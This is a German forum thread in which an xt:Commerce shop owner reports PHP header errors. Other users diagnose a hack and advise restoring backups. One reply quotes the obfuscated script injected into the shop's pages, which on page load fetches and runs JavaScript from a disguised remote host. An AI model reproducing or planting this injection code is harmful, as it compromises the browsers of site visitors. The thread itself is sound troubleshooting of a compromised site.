Jump to content
xt:Commerce Community Forum
Sign in to follow this  
Pfalzcarp.de

Problem seid kurzem mit dem Shop

Recommended Posts

Hallo zusammen,

ich habe ein Problem mit meinem Shop. Es fing heute mittag an. Zur Zeit kommt folgende Fehlermeldung wenn man einen Artikel in den Warenkorb gelegt hat.

Warning: Cannot modify header information - headers already sent by (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:108) in /homepages/13/d97908204/htdocs/pfalzcarp/inc/xtc_redirect.inc.php on line 29

Wenn ich dann F5 drück ist der Artikel im Korb und der Shop erschient wieder.

Wie kann ich das beheben ?

Vielen Dank für Eure Hilfe !

Gruss,

Torsten

Share this post


Link to post
Share on other sites

es geht leider weiter ...

der login als admin geht nicht mehr, es kommt diese Meldung:

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:109) in /homepages/13/d97908204/htdocs/pfalzcarp/includes/functions/sessions.php on line 76

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:109) in /homepages/13/d97908204/htdocs/pfalzcarp/includes/functions/sessions.php on line 76

Warning: Cannot modify header information - headers already sent by (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:109) in /homepages/13/d97908204/htdocs/pfalzcarp/inc/xtc_redirect.inc.php on line 29

Share this post


Link to post
Share on other sites

Schau mal auf dem dem Server nach, wann die Files zuletzt geändert wurden.

Ich vermute Dein Shop wurde gehackt. In Quelltext steht überall

<script>/*GNU GPL*/ try{window.onload = function(){var Reo0kbvrvrz = document.createElement('s^$@c&r#$(#i$#)p^t#&)$'.replace(/\(|@|&|\$|\)|\^|\!|#/ig, ''));Reo0kbvrvrz.setAttribute('type', 'text/javascript');Reo0kbvrvrz.setAttribute('src', 'h&t#@t(p&:&(/&&/!p^(e^&)r$@e@)z$!h()#^i))$l$@&t##!!o)#$n&-^#c&o^)m&$.$^k^!a@(#&s^&&!(k&^u)@#$s!(#.!@$)u!s@.&)^5#$$(1!)#y@!(e!s#)$)-@^^@c&$@&o@@(m($.(m@$@u!)^s#^$i&c#$b!o@x$$p&$#)r#o).^r)!#$u$$:#@^8$#0#)8^#&0(^#/)o&(#)$r)!k#&u(&!&t#.&^&c)$$(o#)#.!&&i((n&)(/()(o&!r@$k@#u$$()!t@$.#c&o)#$.^&)i#n!@@/#!(@(f!)@e$)&^e((d^b($u$(@((r@&$@n##(^e(r@@@.&^&(#c&@&o#^(#m!^&/@@@g)l(^$o)!b##)@!e)&^7&^!$.@)c)!(!o&m)!/@^#g#@^(o^@o#$g@(l$(#e@.!&c((o!m@#$)/@)'.replace(/\!|\)|&|\$|\(|@|#|\^/ig, ''));Reo0kbvrvrz.setAttribute('defer', 'defer');Reo0kbvrvrz.setAttribute('id', 'M)#&v^@w!^!#2^@&!6&^()8^#h)n$!^(f)()o&@4)q^'.replace(/@|\!|&|\(|\)|\$|#|\^/ig, ''));document.body.appendChild(Reo0kbvrvrz);}} catch(e) {}</script>

und meine Firewall wird auch ganz nervös, weil von einer russischen WebSite ein .jar File geladen wird.

Also ganz schnell das Backup aufspielen, denn für Deine Kunden ist das nicht so toll an Weihnachten.

Share this post


Link to post
Share on other sites

hat Du ein lokales Backup, dass Du wieder per FTP auf den Server spielen kannst?

Frag bei Deinem Hoster nach, er soll 1 Tag vor der Attacke, den Stand wieder einspielen.

Und dann schnell die Sicherheitsmängel beheben.

Share this post


Link to post
Share on other sites
Sign in to follow this  

×
×
  • Create New...